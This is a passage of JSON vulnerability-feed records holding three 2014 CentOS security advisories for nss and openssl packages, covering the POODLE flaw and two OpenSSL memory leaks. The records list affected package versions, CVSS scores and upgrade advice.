"lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "any", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "any", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-freebl-devel", "packageFilename": "nss-softokn-freebl-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "any", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:1948\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Netscape Portable Runtime (NSPR) provides platform\nindependence for non-GUI operating system facilities.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nThe nss, nss-util, and nss-softokn packages have been upgraded to upstream\nversion 3.16.2.3, which provides a number of bug fixes and enhancements\nover the previous version, and adds the support for Mozilla Firefox 31.3.\n(BZ#1158159, BZ#1165003, BZ#1165525)\n\nUsers of nss, nss-util, and nss-softokn are advised to upgrade to these\nupdated packages, which contain a backported patch to mitigate the\nCVE-2014-3566 issue, fix these bugs, and add these enhancements. After\ninstalling this update, applications using NSS or NSPR must be restarted\nfor this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/020795.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/020800.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/020802.html\n\n**Affected packages:**\nnss\nnss-devel\nnss-pkcs11-devel\nnss-softokn\nnss-softokn-devel\nnss-softokn-freebl\nnss-softokn-freebl-devel\nnss-sysinit\nnss-tools\nnss-util\nnss-util-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1948.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-12-03T22:45:56", "title": "nss security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-12-04T01:19:11", "href": "http://lists.centos.org/pipermail/centos-announce/2014-December/020795.html", "id": "CESA-2014:1948", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-03T18:24:50", "references": ["https://rhn.redhat.com/errata/RHSA-2014-1653.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "any", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "any", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:1653\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the CVE-2014-3566 issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020693.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020696.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1653.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-10-16T15:21:39", "title": "openssl security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-16T17:53:19", "href": "http://lists.centos.org/pipermail/centos-announce/2014-October/020693.html", "id": "CESA-2014:1653", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-09T11:46:27", "references": ["https://rhn.redhat.com/errata/RHSA-2014-1652.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-perl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-perl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-libs", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-static-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-libs", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-1.0.1e-34.el7_0.6.src.rpm", "packageName": "openssl", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-static", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-1.0.1e-30.el6_5.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.i686.rpm", "packageName": "openssl-devel", "arch": "i686", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-static-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.x86_64.rpm", "packageName": "openssl-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_5.2", "packageFilename": "openssl-static-1.0.1e-30.el6_5.2.x86_64.rpm", "packageName": "openssl-static", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm", "packageName": "openssl-perl", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:1652\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020695.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020697.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2014-October/001475.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-libs\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1652.html", "edition": 3, "reporter": "CentOS Project", "published": "2014-10-16T16:22:42", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "openssl security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2014-10-20T18:15:10", "href": "http://lists.centos.org/pipermail/centos-announce/2014-October/020695.html", "id": "CESA-2014:1652", "cvss": {"score": 7.1, "vector": 